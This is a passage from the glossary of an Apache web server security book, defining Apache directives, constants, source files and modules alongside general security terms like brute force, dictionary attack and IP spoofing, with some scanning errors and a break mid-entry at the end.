audit policy Your audit policy establishes what security events you log to file. For 
example, you can log user logons, policy changes, reboots, and so on. These events 
can be significant in a security context. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


audit trail Data used to record, track, analyze, and report network activity and 
the path you take to derive that data from its source. Raw access logs from your Web 
server are good examples. To polish these, you might use a script that mines the data 
and formats it cleanly. From there, you can isolate events (for example, requests for a 
particular file from a particular address) and from this, you can ascertain facts about 
an attack. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


AllowOverride An Apache directive that lets you specify in what directories users 
or processes can override httpd.conf defaults (and which directives these can over- 
ride). 


AUTH_TYPE Environment variable that stores the authentication method used. 


AuthDBMGroupFile An Apache directive that stores the location of the DBM file that 
contains the list of user groups for user authentication. See Appendix A, “Apache 
Security-Related Modules and Directives,” and Chapter 10, “Apache Network Access 
Control.” 


AuthDBMUserFile An Apache directive that stores the location of the DBM file’ that 
contains the list of users for user authentication. See Appendix A, “Apache Security- 
Related Modules and Directives,” and Chapter 10, “Apache Network Access Control.” 


AuthGroupFile An Apache directive that stores the location of the (text) file’ that 
contains the list of user groups for user authentication. See Appendix A, “Apache 
Security-Related Modules and Directives,” and Chapter 10, “Apache Network Access 
Control.” 
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AuthName An Apache directive that sets the authorization realm’s name for directo- 
ries. See Appendix A, “Apache Security-Related Modules and Directives,” and 
Chapter 10, “Apache Network Access Control.” 


AuthType An Apache directive that sets the user authentication type for the speci- 
fied directory. See Appendix A, “Apache Security-Related Modules and Directives,” 
and Chapter 10, Apache Network Access Control.” 


AuthUserFile An Apache directive that sets the name and location of the (text) file 
containing the list of users and passwords for user authentication. See Appendix A, 
“Apache Security-Related Modules and Directives,” and Chapter 10, “Apache 
Network Access Control.” 


authenticate To verify a user’s, host’s, or session’s identity or integrity. 
authentication The process of authenticating a user, host, session, or process. 
authenticator Any means by which to authenticate a user, node, or process. 
authorization A user’s right to access objects or resources. 


awk (gawk) A text-processing and scanning language. Also called gawk (gawk is a free, 
GNU awk variant). 


B_ASCII2EBCDIC An Apache Web server constant in buff.h. See Appendix D, 
“Apache API Quick Reference.” 


B_SFIO An Apache Web server constant, available at compile-time, which provides 
sfwrite and sfread support. See Appendix D, “Apache API Quick Reference.” 


back door A hidden program left behind by an intruder that gives him future 
access to his victim host. 


background The “place” where you send low-priority processes. Processes can 
either run in the foreground (in which case, their output is printed directly to your 
terminal in real-time), or the background. When in the background, processes don’t 
interrupt your terminal session until they need more data from you or need to notify 
you that they've finished. This is a historical holdover to when you could access 
only one virtual terminal at a time. To send a process into the background, issue the 
command plus the ampersand symbol & (Example: command &). This sends the 
program command into the background. 


backup To preserve a file system or files, usually for disaster recovery. Generally, 
you backup to tape, floppy disk or other, portable media that you can store safely for 
later use. 


bash The Bourne-Again Shell, a sh-compatible command interpreter. Compare with 
csh, ksh, and tcsh. 
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biometric access controls Systems that authenticate users by biological charac- 
teristics, such as their face, fingerprints, or retinal pattern. 


biometrics See biometric access controls. 


Blowfish A 64-bit encryption scheme developed by Bruce Schneier. Blowfish is 
often used for high-volume, high-speed encryption. (Blowfish is reportedly faster 
than both DES and IDEA.) To learn more, go to http://www. counterpane .com/blow- 
fish. html. 


broadcast/broadcasting Any network message sent to all network interfaces, or 
the practice of sending such a message. 


brute force attack A brute force attack is primitive. In it, every possible combi- 
nation is tried until the attacker lands on the correct one. To appreciate this process, 
think of an attaché case with a combination lock. Such locks usually have three 
wheels, and each wheel runs from numbers 0 to 9. To try all possible combinations 
on such a lock would take 999 tries, or 1,998 total tries for both the right and left 
locks. However, in reality, you would likely open the case long before exhausting 
your 1,998 possibilities. You could increase your chances dramatically by trying more 
likely combinations first, like 007, 666, and 777, as well as matching combinations 
that span both locks. (For example, where the left three wheels are 2,4,6 and the 
three right wheels are 8,1,0, which spell out 2-4-6-8-10.) In such a scheme, your 
search would start at 000, progress to 001, and so on.) 


bug A bug is a hole, weakness, or flaw in a computer program, typically related to 
programmer error or sloppiness. See vulnerability. 


buildmark.c Apache source file that returns the date and time of the server’s build. 
Includes ap_config.h and httpd.h. 


C The C programming language. 


C++ Object-oriented programming language that resembles C but is, some say, 
more powerful. C++ relies heavily on inheritable classes. 


C shell The C shell (csh), a Unix-based language interpreter (shell) that supports C 
programming language-like syntax and language. 


CA See Certificate Authority. 


C4I Command, Control, Communications, Computers, and Intelligence—an infor- 
mation warfare term. 


case sensitivity A condition where the system differentiates between upper and 
lower case letters. 


Cast-128 An encryption algorithm that uses large keys, and can be incorporated 
into cryptographic applications. Learn more by obtaining RFC 2144. 
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CERT The Computer Emergency Response Team. CERT assists victims of cracker 
attacks and provides valuable research to the Internet community at large. Learn 
more here: http: //www.cert.org. 


Certificate Authority Trusted third party that issues security certificates and 
verifies their authenticity. Probably the most renowned commercial certificate 
authority is VeriSign. VeriSign issues certificates for Microsoft-compatible ActiveX 
components, among other things. 


certification Either the end result of a successful security evaluation of a product 
or system, or an academic honor bestowed on one who successfully completes 
courses in networking (such as MCSE/A+ certification). 


chaos Mathematicians sometimes refer to chaos as the great disorder, formless 
matter in infinite space, or something so disorderly or random that no pattern exists 
within it. Recent studies suggest that true chaos may be elusive. Research shows that 
even in chaos, order can exist. That is, in chaos, discernable, observable patterns do 
sometimes arise when one examines the specified system over long time periods. 
When these patterns repeat themselves in even a semi-orderly fashion, what initially 
seemed to be a true chaotic system loses its status as such. Studies of chaos are 
common to the cryptography field, along with research in which scientists search for 
“true” randomness. 


checksum A numeric value composed of the sum (or a finite number) of a file’s 
bits. Checksums can verify file integrity. For example, many network programs use 
checksums to verify that transmitted data arrives at its destination intact. Typically, 
network applications generate the checksum at the data’s origin and transmit this 
value to the receiving application. Receiving applications then recalculate the data’s 
checksum. If there’s a match, everything went smoothly. If not, the data was 
damaged in transit, and the applications attempt a resend. 


chroot A restricted environment in which processes run “in prison” so to speak; 
these cannot access the filesystem at large (outside of the environment you specify). 


client Software that interacts with a specific server application. WWW browsers 
(Netscape Communicator, Internet Explorer, Opera) are WWW clients. Developers 
design them specifically to interact with Web servers. 


client-server model A networking model wherein one server can distribute data 
to many clients. The relationship your Web server has to Web clients or browsers is a 
client-server relationship (Apache being the server, browsers being the clients). In 
this model, the server generally performs computational services and returns results 
to the client. Most network applications and protocols are client-server oriented. 


cmd_how An Apache Web server constant that defines how Apache handles argu- 
ment processing for instances of command_rec. See Appendix D, “Apache API Quick 
Reference.” 
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Common Gateway Interface (CGI) A standard that specifies programming 
techniques to pass data from Web servers to Web clients. CGI is language neutral. 
CGI programs can therefore operate in Perl, C, C++, Python, Visual Basic, BASIC, and 
shell languages. CGI programs can raise security issues. See Chapter 12, “Hacking 
Secure Code: Apache at Server Side.” 


confidentiality The principle or policy by which data is sensitive or privileged, 
and therefore not for general consumption or viewing. 


config.c Apache server source file that contains functions that handle bookkeep- 
ing for Apache configuration (loaded modules, config vectors, and so on). Includes 
apr.h, apr_strings.h, apr_portable.h, apr_file_io.h, apr_want.h, ap_config.h, 
httpd.h, http_config.h, http_protocol.h, http_core.h, http_log.h, 
http_request.h, http_main.h, http_vhost.h, util_cfgtree.h, and mpm.h. 


connection.c Apache server source file that contains functions that handle graceful 
connection closing with clients from disparate platforms. Includes apr.h, 
apr_strings.h, ap_config.h, httpd.h, http_connection.h, http_request.h, 
http_protocol.h, ap_mpm.h, mpm_default.h, http_config.h, http_vhost.h, score- 
board.h, http_log.h, and util_filter.h. 


CONTENT_LENGTH Environment variable that stores the length of input stream data. 


CONTENT_TYPE Environment variable that stores the Internet media type of input 
stream. 


contingency plan Procedure or procedures you undertake when an emergency or 
disaster arises. Example: What if your Web server goes down? What if this occurs on 
a weekend? Can you get someone to fix it? You must have a contingency plan to 
handle unforeseen circumstances. 


core.c Apache server source file that contains server core functionalities, including 
options and commands that control other modules, NCSA backward compatibility, 
URL handling, and so on. Includes apr.h, apr_strings.h, apr_lib.h, 
apr_fnmatch.h, apr_hash.h, apr_thread_proc.h, apr_want.h, ap_config.h, 
httpd.h, http_config.h, http_core.h, http_protocol.h, http_request.h, 
http_vhost.h, http_main.h, http_log.h, rfc1413.h, util_md5.h, http_connec- 
tion.h, apr_buckets.h, util_filter.h, util_ebcdic.h, mpm.h, mpm_common.h, 
scoreboard.h, mod_core.h, and mod_proxy.h. 


COTS Commercial-Off-The-Shelf. 
countermeasure Any action or technique that minimizes or eliminates a threat. 


CR An Apache Web server constant in httpd.h that lets you define how Apache 
handles carriage returns. See Appendix D, “Apache API Quick Reference.” 
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CRLF An Apache Web server constant in httpd.h that defines how Apache 
handles a carriage return plus linefeed (and it does it as a string). See Appendix D, 
“Apache API Quick Reference.” 


crack Loosely defined, any software, procedure, or technique that circumvents 
security. Less loosely defined, a crack is a Unix-based password cracker called Crack. 
Also: to breach system security or commercial software registration schemes. 


cracker Someone who unlawfully and with malice breaches system security. 
crash When a system fatally fails and requires reboot. 
CRC CRC is Cyclic Redundancy Check, an operation to verify data integrity. 


cryptography The science of secret writings. In cryptography, you scramble your 
writings so they remain unreadable to unauthorized personnel. Theoretically, only 
authorized users can unravel an encrypted message. However, your encrypted 
message’s ability to evade unauthorized eyes depends on the type and strength of 
encryption you use. 


C shell A Unix command interpreter with C-like syntax. 


DAC (Discretionary Access Control) DAC provides the means for a central 
authority to either permit or deny access to all users, and to do so incisively based 
on time, date, file, directory, or host. 


data-driven attack An attack that deploys hidden or encapsulated data designed 
to flow through a firewall undetected. Java and JavaScript can be used for such 
attacks, although most firewalls and VPNs can now screen content. 


Data Encryption Standard (DES) IBM Encryption standard originating in 
1974 and published in 1977. DES was the U.S. government standard for encrypting 
nonclassified data. 


data integrity Data integrity refers to the state of files. If files are unchanged and 
no one has tampered with them, they have integrity. If someone has tampered with 
them, their integrity is breached or degraded. 


DEFAULT_ADMIN An Apache Web server constant available at compile-time that lets 
you specify where httpd’s admin will go. (The default is set in http.h). See Appendix 
D, “Apache API Quick Reference.” 


DEFAULT_CONTENT_TYPE Web server constant in httpd.h—but also available at 
compile-time—that lets you specify what Apache’s default content type will be. See 
Appendix D, “Apache API Quick Reference.” 


DEFAULT_HTTP_PORT Web server constant that defines the default port on which 
Apache will listen for requests (the default is port 80). See Appendix D, “Apache API 
Quick Reference.” 
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DEFAULT_HTTPS PORT Web server constant that defines the default port on which 
Apache will listen to SSL/HTTPS requests (the default is port 443). See Appendix D, 
“Apache API Quick Reference.” 


DEFAULT_INDEX An Apache Web server constant available at compile-time that lets 
you set the default index (or a series of default documents, listed in priority) that 
Apache returns when users call the DocumentRoot directory without a file specifica- 
tion (the default is index.html). See Appendix D, “Apache API Quick Reference.” 


DEFAULT_KEEPALIVE An Apache Web server constant available at compile-time that 
lets you specify the keep-alive interval. See Appendix D, “Apache API Quick 
Reference.” 


DEFAULT_KEEPALIVE_ TIMEOUT An Apache Web server constant available at compile- 
time that lets you specify the time before which Apache will kill a keep-alive session. 
See Appendix D, “Apache API Quick Reference.” 


DECLINE_CMD An Apache Web server constant in http.h that handles how modules 
decline a command and whether they pass that request on so that other modules 
can have a crack at it. See Appendix D, “Apache API Quick Reference.” 


DECLINED An Apache Web server constant in http.h that handles how modules 
decline a request and whether they pass that request on so that other modules can 
have a crack at it. See Appendix D, “Apache API Quick Reference.” 


DEFAULT_PATH An Apache Web server constant available at compile-time that lets 
you specify where httpd will house itself. See Appendix D, “Apache API Quick 
Reference.” 


DEFAULT_TIMEOUT An Apache Web server constant available at compile-time that 
lets you specify Apache’s main timeout interval. See Appendix D, “Apache API Quick 
Reference.” 


denial-of-service attack A condition wherein your server becomes inoperable 
after an attack. When an attacker undertakes a denial-of-service attack, he seeks to 
disable your server and thereby deny service to legitimate users. 


dictionary attack Dictionary or wordlist attacks work like this: Crackers obtain 
your encrypted passwords and, using the same password algorithm as your system, 
encrypt many thousands of words. They generally derive the words from dictionar- 
ies, hence the name. Their software then compares each newly encrypted word to 

your encrypted passwords. When a match occurs, that password is deemed cracked. 


digest access authentication A security extension for HTTP that provides only 
basic, nonencrypted user authentication over the Web. To learn more, please see RFC 
2069. 
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digital certificate Digital certificates are typically numeric values derived from 
cryptographic processes, and you or Apache can use these to verify users or hosts. 


DOCUMENT_LOCATION An Apache Web server constant available at compile-time that 
lets you specify DocumentRoot (where the default directory and top-level default 
index reside). See Appendix D, “Apache API Quick Reference.” 


DONE An Apache Web server constant that Apache returns when module phase 
handlers complete a request (inside request_rec). See Appendix D, “Apache API 
Quick Reference.” 


DoS See denial-of-service attack. 


DSS (Digital Signature Standard) The Digital Signature Algorithm. DSS makes 
use of the Digital Signature Algorithm, and lets you or Apache identify a message’s 
sender and authenticity. Find DSS specifications in the National Institute of 
Standards and Technology’s (NIST) Federal Information Processing Standard (FIPS) 
186: http: //ww.itl.nist.gov/div897/pubs/fip186.htm. 


EDI Electronic Data Interchange. EDI empowers chiefly large enterprises (multina- 
tionals, governments, and so on). EDI standards specify data formatting conventions 
for automated transmissions in everything from procurement to medical billing to 
defense auditing. EDI messages generally travel in plain text, but each line or data 
element has a preceding tag that identifies what that element represents (address, 
name, zip code). Participating enterprises that agree on and adopt a mutual standard 
can thus send electronic data (typically commercial data) between networks of 
disparate architecture cleanly, accurately, and seamlessly. For more information on 
such standards, visit The X12 Consortium (http: //www.x12.org) or The Data 
Interchange Standards Association (http: //www.disa.org). 


encryption The process of scrambling data so that it’s unreadable by unautho- 
rized parties. In most encryption schemes, you must have a password to reassemble 
the data into readable form. Encryption enhances privacy and can protect sensitive, 
confidential, privileged, proprietary, classified, secret, or top secret information. 


environment variable Environment variables are values that denote your 
default shell, home directory, mail directory, path, username, time zone, and so on. 
Shells use these variables to determine where to send mail, store your files, find 
commands, and so on. Many environment variables exist, and generally your operat- 
ing system sets them automatically when you login. See $SHELL, $HOME, $MAIL, $PATH, 
$LOGNAME, $TERM, and $TZ. 


EPL Evaluated Products List. 


execute Execute permissions grant users, groups, or others the right to execute the 
specified file. 
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filtering Loosely defined, the process of checking network packets for integrity 
and security. Filtering is typically an automated process performed by either routers 
or software. In Apache terms, a system whereby you can specify and send files to or 
through a filter or program that handles them in a special way. 


firewall A device (hardware or software) that refuses unauthorized users access to 
a host or examines each packet’s source address or content and performs some prede- 
fined operation based on what it finds therein. 


gen_test_char.c Apache server source file that contains an encoded table (used in 
conjunction with util.c) to scan for certain characters (& ;,°,', \, ",|, *, 2, ~, <)>, 
^ (s), [5], {,}, and $). Includes apr.h, apr_lib.h, stdio.h, ap_config.h, and 
httpd.h. 


foreground Where programs run by default, where you can see their output in 
real-time, and where they eat maximum memory resources. Compare this with 
background. 


fork A program flow event when your operating system or application creates a 
new or child process. During a fork, the system or application makes a copy of the 
original or parent process. The child then continues to work independently of the 
parent. 


GOTS  Government-Off-The-Shelf. 


granularity Degree to which you can incisively apply access controls. The more 
granularity, the more incisive you can get. 


group A collection of users represented by a value, typically a name, alias, or label. 
Such values let you specify file or network permissions to many individuals at once. 
Users belonging to the same group share similar or identical access privileges. 


hacker Someone interested in operating systems, software, security, and network- 
ing. Also a programmer. 


history Your command history. In csh, you can review your command history 
with the history command. In response, csh echoes commands you recently used 
and precedes them by sequential numbers. To recall a command, issue a bang (!) 
plus the command history number. Example: If command number 33 was 1s -1, 
recall it like this: !33. 


home The directory your operating system drops you into when you login. In 
Unix, it’s typically /home/hacker, where hacker is your username. In Windows, it 
varies. See $HOME. 


host A computer with a network address. 
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host table A record of hostname-network address pairs. Host tables identify the 
name and location of each host on your network. Your operating system consults 
this before it begins a data transmission. Think of a host table as an address book. 


hosts_access A system and language common to tcpd that controls what users 
can access your server. 


hosts_options A system that provides optional extensions for controlling access to 
your server (an extension to hosts_access). 


hosts.equiv The trusted remote hosts and users database on some Unix platforms; 
a file that contains host names and addresses that localhost trusts. 


htpasswd A program for creating and manipulating HTTP-server password files. 


HTTP_ACCEPT MIME Environment variable that stores the types the client will 
accept. 


HTTP_ACCEPTED Web server constant that defines Accepted status (indicating a 
request was accepted but not yet processed). See Appendix D, “Apache API Quick 
Reference.” 


HTTP_BAD_GATEWAY Web server constant that denotes bad gateway status (where 
Apache acts as a proxy/gateway and can’t fulfill a request because another server 
failed somehow). See Appendix D, “Apache API Quick Reference.” 


HTTP_BAD_REQUEST Web server constant that denotes bad request status (where the 
client sends a malformed request, and therefore Apache cannot understand it). See 
Appendix D, “Apache API Quick Reference.” 


HTTP_FORBIDDEN Web server constant denoting that Apache understood the client’s 
request but refuses to satisfy it. See Appendix D, “Apache API Quick Reference.” 


HTTP_GATEWAY_TIME_OUT Web server constant that defines the time after which 
Apache will timeout a gateway request (usually because the gateway server failed to 
respond). See Appendix D, “Apache API Quick Reference.” 


HTTP_GONE Web server constant denoting that the requesting resource is gone and 
left no forwarding address. See Appendix D, “Apache API Quick Reference.” 


HTTP_INTERNAL_SERVER_ERROR Web server constant that denotes that Apache 
couldn’t complete a request for server error. See Appendix D, “Apache API Quick 
Reference.” 


HTTP_LENGTH_REQUIRED Web server constant denoting that the request didn’t come 
with a content length (which Apache won’t tolerate), and therefore Apache fails to 
return it. See Appendix D, “Apache API Quick Reference.” 
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HTTP_METHOD_NOT_ALLOWED Web server constant denoting that the method the 
client requested on the processed URL is not allowed. See Appendix D, “Apache API 
Quick Reference.” 


HTTP_MOVED_PERMANENTLY Web server constant denoting that the requested resource 
has moved permanently. See Appendix D, “Apache API Quick Reference.” 


HTTP_MOVED_TEMPORARILY Web server constant denoting that the requested resource 
has moved temporarily. See Appendix D, “Apache API Quick Reference.” 


HTTP_NO_CONTENT Web server constant denoting that Apache retrieved the specified 
resource, but found no data there. See Appendix D, “Apache API Quick Reference.” 


HTTP_NOT_ACCEPTABLE Web server constant denoting that the request isn’t accept- 
able based on the headers. See Appendix D, “Apache API Quick Reference.” 


HTTP_NOT_FOUND Web server constant denoting that Apache couldn’t find the 
requested resource. See Appendix D, “Apache API Quick Reference.” 


HTTP_OK Web server constant denoting that everything is fine; Apache completed 
the operation successfully. See Appendix D, “Apache API Quick Reference.” 


HTTP_PAYMENT_REQUIRED Web server constant denoting that payment is required. 
Not yet implemented, but let your imagination run wild on what developers will 
integrate this into. 


HTTP_PRECONDITION_FAILED Web server constant denoting that one of the request’s 
headers, when tested, returned false. See Appendix D, “Apache API Quick Reference.” 


HTTP_PROXY_AUTHENTICATION REQUIRED Web server constant that denotes that the 
client must first authenticate itself before Apache will satisfy the current request. See 
Appendix D, “Apache API Quick Reference.” 


HTTP_REFERER URL Environment variable that stores the referring document’s URL. 


HTTP_REQUEST_ENTITY_TOO_LARGE Web server constant denoting that the request 
entity is larger than Apache can handle. See Appendix D, “Apache API Quick 
Reference.” 


HTTP_REQUEST_TIME_OUT Web server constant that denotes the time that Apache 
will wait for a request from the client. If the client fails to request within that period, 
Apache abandons the wait. See Appendix D, “Apache API Quick Reference.” 


HTTP_REQUEST_URI_TOO_LARGE Web server constant that denotes that the client sent 
a URL/URI that’s larger than what Apache can handle. See Appendix D, “Apache API 
Quick Reference.” 


HTTP_SERVICE_UNAVAILABLE Web server constant denoting that Apache is over- 
loaded or unavailable, and therefore unable to process requests at the time. See 
Appendix D, “Apache API Quick Reference.” 
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HTTP_UNAUTHORIZED Web server constant denoting that the client needed authoriza- 
tion to access the requested resource and failed to obtain that authorization. See 
Appendix D, “Apache API Quick Reference.” 


HTTP_UNSUPPORTED_MEDIA_TYPE Web server constant denoting that Apache cannot 
process the request because the media type is unsupported. See Appendix D, “Apache 
API Quick Reference.” 


HTTP_USE_PROXY Web server constant denoting that the client must route the 
request through the specified proxy. See Appendix D, “Apache API Quick Reference.” 


HTTP_VERSION_NOT_SUPPORTED Web server constant denoting that the client sent a 
request containing an HTTP version that the current Apache version doesn’t support. 
See Appendix D, “Apache API Quick Reference.” 


HTTPD_ROOT An Apache Web server constant available at compile-time that lets you 
set ServerRoot. See Appendix D, “Apache API Quick Reference.” 


httpd Apache Hypertext Transfer Protocol Server (your Web server), an executable 
file that starts and stops your Web server. 


HTTPS The HTTPS variable specifies whether the server is using HTTPS. See Chapter 
15, “Apache/SSL.” 


HTTPS_CIPHER ‘The HTTPS_CIPHER environment variable specifies which cipher is 
being used. See Chapter 15, “Apache/SSL.” 


HTTPS_KEYSIZE The HTTPS_KEYSIZE environment variable specifies the session key 
size. See Chapter 15, “Apache/SSL.” 


HTTPS _SECRETKEYSIZE The HTTPS SECRETKEYSIZE environment variable specifies 
what secret key size is being used. See Chapter 15, “Apache/SSL.” 


HTTP_USER_AGENT Environment variable that stores the client software identifica- 
tion. 


hypertext A language that tells Web clients how to display data. Hypertext is 
different than plain text because it’s interactive. In a hypertext document, you click 
or choose any highlighted text or link and the system retrieves the data associated 
with it. 


Hypertext Transfer Protocol (HTTP) The protocol used to traffic hypertext 
across the Internet, and the underlying protocol of the WWW. 


ifconfig A Unix tool that diagnoses and configures network interfaces. 


inetd.conf Internet servers database, a file that lists what services (FTP, TFTP, and 
so on) your server makes available, and how your server will launch such services 
when other hosts request them. (In more recent times, xinetd.conf, the configura- 
tion file for xinetd, an enhanced inetd, had superseded inetd.conf.) 
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International Data Encryption Algorithm (IDEA) IDFA is a powerful block- 
cipher encryption algorithm that operates with a 128-bit key. IDEA encrypts data 
faster than DES and is far more secure. 


Internet Protocol Security Option (IPSEC) IP security option used to protect 
IP datagrams even going as far as to order and classify packets according to U.S. 
government categories: unclassified, classified secret, and top secret. See RFC 1038 
(ftp: //ftp.isi.edu/in-notes/rfc1038.txt) and RFC 1108 (ftp://ftp.isi.edu/in- 
notes/rfc1108.txt) 


interpreter Generally a command interpreter, a shell, or a program that passes 
your instructions to the operating system and reports the results. Less generally, a 

program that reads in and executes special data. Examples: a PostScript interpreter 
reads postscript data and displays it in documents; A BASIC interpreter runs BASIC 
code. 


IPC Inter-Process Communication. 


intrusion detection The practice of using automated systems to detect intrusion 
attempts. 


IP spoofing Procedure where an attacker assumes another host’s IP to exploit 
trust relationships between machines. 


ipfwadm A Linux-based firewall and accounting administration tool. 
ISO International Standards Organization. 


Java A Sun Microsystems programming language that is object-oriented, suited to 
graphics, multimedia, and networking, and resembles C++, relying heavily on 
objects, messages, classes, and inheritance. Learn more at 

http: //developer.java.sun.com/. 


JavaScript Netscape Communications Corporation programming language that 
runs in and manipulates Web browser environments, including Navigator, MSIE, 
Opera, and others. JavaScript has extended functionality and can under certain 
conditions affect local client systems, even reaching beyond a browser environment 
and to the underlying system itself. It therefore can pose security risks in some cases. 
To cut down on cross-browser compatibility issues, the IETF (Internet Engineering 
Task Force) and related organizations standardized JavaScript and re-designated it as 
EMCAScript. Learn more at the European Computer Manufacturers Association, 
located here: http: //www.ecma.ch/. 


job A running process. 
job control Feature that lets you start and stop jobs interactively. See job. 


job number A number assigned to a particular job. See job. 
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Kerberos Massachusetts Institute of Technology encryption and authentication 
system that incorporates into network applications, relies on trusted third-party 
servers for authentication, and armors data against electronic eavesdropping. 


Kerberos Network Authentication Service Ticket-based authentication 
scheme that you can integrate into network applications. See RFC 1510. 


key Loosely defined, a unique value derived from an algorithmic process that 
identifies a process, host, or user. In public key-private-key encryption, users have 
both public and private keys. They distribute their public key so others can encrypt 
messages to it. Such a message can only be decrypted with a user’s private key. Not 
even the author of that message can unravel it. Users, therefore, store their private 
keys securely. 


key pair A key pair consists of two elements—a private key and its corresponding 
public key in an asymmetric cryptographic system. See key. 


Linux A Unix flavor that runs on widely disparate architectures, including X86, 
Alpha, Sparc, and PowerPC processors. Linux is a popular Web server platform and 
ships with Apache Web Server. 


listen.c Apache server source file that handles Apache’s socket functions (includ- 
ing testing for IPv6, using large TCP windows when possible, and so on). Includes 
apr_network_io.h, apr_strings.h, apr_lock.h, apr_want.h, ap_config.h, httpd.h, 
http_config.h, ap_listen.h, http_log.h, mpm.h, and mpm_common.h. 


log.c Apache server source file that contains functions that handle logging. 
Includes apr.h, apr_general.h, apr_strings.h, apr_errno.h, apr_thread_proc.h, 
apr_lib.h, apr_signal.h, apr_want.h, stdarg.h, unistd.h, ap_config.h, httpd.h, 
http_config.h, http_core.h, http_log.h, and http_main.h. 


MD5 MDS isa message digest algorithm that produces a digital fingerprint of spec- 
ified input. Since such a fingerprint is unique, and it’s mathematically difficult to 
create a duplicate, developers use MDS to authenticate file and session integrity. 


main.c Apache server source file that contains startup functions and usage output. 
Includes apr.h, apr_strings.h, apr_getopt.h, apr_general.h, apr_lib-h, 
apr_want.h, ap_config.h, httpd.h, http_main.h, http_log.h, http_config.h, 
http_vhost.h, apr_uri.h, util_ebcdic.h, ap_mpm.h, and xmlparse.h. 


metacharacter A symbol common to configuration files, shell scripts, Perl 
scripts, and C source code. Typical metacharacters and metacharacter combinations 
are ., !, @, #, $, %, ^, & &&, *, >, >>, <, <<, !=, ==, +=, ?, =, |, | |, and ~. Check the 
beginning of this glossary for more on these metacharacters. 


mirroring Mirroring is the practice of duplicating disk volumes for the purpose 
of redundancy. Typically you do this across separate drives, or even across separate 
hosts. 
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mod_access An Apache access control module that provides access control based on 
client hostname, IP address, and environment variables. See Appendix A, “Apache 
Security-Related Modules and Directives.” 


mod_actions A dynamic content Apache module that provides support for execut- 
ing CGI scripts based on media type or request method. See Appendix A, “Apache 
Security-Related Modules and Directives.” 


mod_alias A URL-mapping Apache module that maps different parts of the host 
filesystem in the document tree, and handles URL redirection. See Appendix A, 
“Apache Security-Related Modules and Directives.” 


mod_auth An Apache access control module that provides user authentication using 
plain text files. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_auth_anon An Apache access control module that provides anonymous user 
access to authenticated areas. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_auth_db An Apache access control module that provides user authentication 
using Berkeley DB files. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_auth_dbm An Apache access control module that provides user authentication 
using DBM files. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_auth_digest An Apache access control module that provides MD5 authentica- 
tion. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_auth_ldap An Apache access control module that provides user authentication 
using LDAP. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_autoindex A directory-handling Apache module that provides automatic direc- 
tory listings. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_cern_meta An HTTP response module that adds support for HTTP header 
metafiles. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_cgi A dynamic content Apache module that provides support for invoking 
CGI scripts. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_cgid A dynamic content Apache module that provides support for invoking 
CGI scripts using an external daemon. See Appendix A, “Apache Security-Related 
Modules and Directives.” 


mod_charset_lite A content-type Apache module that configures character set 
translation. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_dav Apache module that offers Class 1, and 2 WebDAV HTTP extensions. See 
Appendix A, “Apache Security-Related Modules and Directives.” 
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mod_dir A directory-handling Apache module that provides basic directory 
handling. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_env An environment-related Apache module that handles the passing of envi- 
ronments to CGI scripts. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_example Apache module that demonstrates the Apache API. See Appendix A, 
“Apache Security-Related Modules and Directives.” 


mod_expires An HTTP response module that applies expires headers to resources. 
See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_ext_filter A dynamic content Apache module that provides support for 
filtering content with external programs. See Appendix A, “Apache Security-Related 
Modules and Directives.” 


mod_file_cache Apache module that offers caching files in memory for faster 
serving. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_headers An HTTP response module that can add, delete, or replace arbitrary 
HTTP headers to resources. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_imap The imagemap file handler Apache module. See Appendix A, “Apache 
Security-Related Modules and Directives.” 


mod_include A dynamic content Apache module that provides support for server- 
parsed documents. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_info An internal content handler module for Apache that offers server config- 
uration information. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_isapi A dynamic content Apache module that provides support for Windows 
ISAPI Extension support. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_ldap Apache module that offers an LDAP connection pool and shared memory 
cache. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_log_config A logging-related Apache module that is a user-configurable 
logging replacement for mod_log_common. See Appendix A, “Apache Security-Related 
Modules and Directives.” 


mod_mime A content-type Apache module that determines document types using 
file extensions. See Appendix A, “Apache Security-Related Modules and Directives.” 
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mod_mime_magic A content-type Apache module that determines document types 
using magic numbers. This is a second line of defense if mod_mime fails to handle the 
request. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_negotiation A content-type Apache module that handles content negotiation. 
See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_proxy An Apache module dealing with caching proxy abilities. See Appendix 
A, “Apache Security-Related Modules and Directives.” 


mod_rewrite A URL-mapping Apache module that maps URIs to filenames using 
regular expressions. See Appendix A, “Apache Security-Related Modules and 
Directives.” 


mod_setenvif An environment-related Apache module that handles environment 
variables based on client information. See Appendix A, “Apache Security-Related 
Modules and Directives.” 


mod_so Apache module that offers support for loading modules at runtime. See 
Appendix A, “Apache Security-Related Modules and Directives.” 


mod_speling A URL-mapping Apache module that corrects simple spelling errors in 
URLs. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_ssl Apache module that offers Secure Sockets Layer (SSL) and Transport Layer 
Security (TLS) protocol support. See Appendix A, “Apache Security-Related Modules 
and Directives.” 


mod_status An internal content handler module for Apache that offers server status 
display. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_suexec A dynamic content Apache module that provides support for running 
CGI requests as a specified user and group (which will be different than Apache’s 
user and group). See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_unique_id An environment-related Apache module that generates a unique 
request identifier for every request. See Appendix A, “Apache Security-Related 
Modules and Directives.” 


mod_userdir A URL-mapping Apache module that maps user home directories. See 
